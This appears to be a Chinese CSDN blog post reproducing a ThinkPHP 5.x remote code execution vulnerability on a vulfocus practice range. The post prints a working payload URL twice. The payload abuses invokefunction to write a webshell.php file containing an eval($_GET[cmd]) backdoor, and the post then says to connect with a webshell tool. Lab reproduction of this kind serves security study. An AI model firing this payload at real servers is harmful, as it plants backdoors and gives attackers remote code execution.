vulfocus靶场thinkphp命令执行cve-2018-1002015

已于 2024-04-23 10:54:48 修改
阅读量317 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: thinkphp
于 2024-04-21 21:36:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27249127/article/details/138044727
版权

thinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码

开启靶场:

使用工具: thinkphp综合利用工具,

payload :

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

然后使用webshell工具进行连接即可

西蒙娜
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究-基于ThinkPHP框架的网络安全攻防实训平台中靶场中心模块的设计与实现 .pdf
08-18
基于ThinkPHP框架的网络安全攻防实训平台中靶场中心模块的设计与实现,王莎莎,辛阳,针对目前大部分高校实验室无法在课堂教学中展现出具有实际网络环境特色的攻防技术的问题,本文提出以ThinkPHP框架和Bootstrap前端框架�
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
漏洞复现-thinkphp-代码执行vulfocus/thinkphp-cve_2018_1002015
10-14 1558
thinkphp-代码执行】函数
CVE-2024-4577】PHP CGI 远程代码执行漏洞
最新发布
qq_21039641的博客
06-08 1724
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码。
Thinkphp Vulhub靶场
apple_51763401的博客
10-06 277
(3)在一组数据{abcdefgh}中,通过命令执行函数的方式,该数组可以依次执行:a-->b(值即执行b语句) c-->d(值即执行d语句),而在thinkphp中正好该方式体现在url的路由上,故会有s=/index(a)/index(b)/xxx(c)/${print(phpinfo())}(d)的payload;(4)了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 993
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
vulhub靶场thinkphp漏洞复现
weixin_44300286的博客
03-08 1559
0x01、ThinkPHP 2.x 任意代码执行漏洞 原理 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞漏洞复现 直接
CTFshow phpCVE
starttv的博客
12-05 792
CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: 攻击者可以使用换行符(%0a)来破坏​指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。安装漏洞利用工具 在phuip-fpizdam目录下执行 go run . "htt
基于ThinkPHP8和Element-Plus的在线教育平台设计源码
04-04
本设计源码提供了一个基于ThinkPHP8和Element-Plus的在线教育平台。项目包含9313个文件,主要使用PHP编程语言,并包含了JavaScript、Vue、CSS、Java、微信小程序、C#、HTML、TypeScript和Shell。文件类型包括3516个...
thinkphp3.23+B-JUI开发的CRM.rar
12-04
《基于ThinkPHP3.23+B-JUI的CRM系统开发详解》 CRM(Customer Relationship Management,客户关系管理)系统是企业管理和维护客户关系的重要工具,它涵盖了销售、市场营销和服务等多个领域,旨在提升企业的效率和...
Thinkphp6+nginx-rtmp实现大型娱乐互动直播平台
06-30
ThinkPHP6 + obs + Nginx-rtmp + xgplayer + workerman + layui 实现大型企业级全民娱乐互动直播平台。直播,已然成为当下最炙热的互联网名词,从娱乐互动到直播购物,从视频会议到直播教育,直播的场景出现在了生活...
thinkphp5.0整合H-ui的博客后台
03-30
ThinkPHP5.0与H-ui整合构建博客后台系统详解》 在当今互联网技术日新月异的时代,高效、易用且功能强大的后端框架与前端界面设计是开发者的重要工具。ThinkPHP5.0作为国内广泛应用的PHP框架,以其优秀的性能、...
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
thinkphp-bjyblog 开源博客系统 v1.1
10-11
thinkphp-bjyblog 开源博客系统 v1.1》是一个基于ThinkPHP框架构建的个人博客系统,专为开发者和学习者设计。这个开源项目旨在帮助用户建立自己的知识整理平台,同时也为初学者提供了一个深入理解ThinkPHP框架的...
thinkphp5.X-Batch-getshell-master.rar
03-31
在网络安全领域,尤其是Web应用安全方面,"getshell"一词通常意味着攻击者成功获得了服务器的命令执行权限,能够执行任意系统命令,对服务器造成严重威胁。针对ThinkPHP5.x框架的getshell漏洞,本文将详细探讨其原理...
ThinkPHP6.0.0---TP6.0.5框架包
10-29
《深入解析ThinkPHP6.0.0到6.0.5框架演化》 ThinkPHP6.0.0至6.0.5是一个重要的版本迭代,它代表了国内PHP开发框架的发展趋势,也是广大开发者们热衷研究和使用的工具。本文将深入探讨这个系列版本中的关键特性、...
CTFSHOW PHPCVE复现
snowlyzz的博客
10-03 879
PHPCVE 复现学习
ctfshow web入门(phpcve)
qq_53263789的博客
07-19 712
ctfshow
php漏洞cve,PHP-5.3.9远程执行任意代码漏洞(CVE-2012-0830)
weixin_34561662的博客
03-09 254
还记得我之前说的PHP Hash Collisions Ddos漏洞吧? 最初的时候, 开发组给出的修复方案, 采用的是如果超过max_input_vars, 就报错(E_ERROR), 继而导致PHP出错结束. 而后来, 为了更加轻量级的解决这个问题, 我们又改善了一下, 变成了如果超过max_input_vars, 就发出警告(E_WARNING), 并且不再往目的数组添加, 但是流程继续....
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
ThinkPHP是一款快速、简单的PHP开发框架,该框架在处理某些特定情况下的输入时存在代码执行漏洞。攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值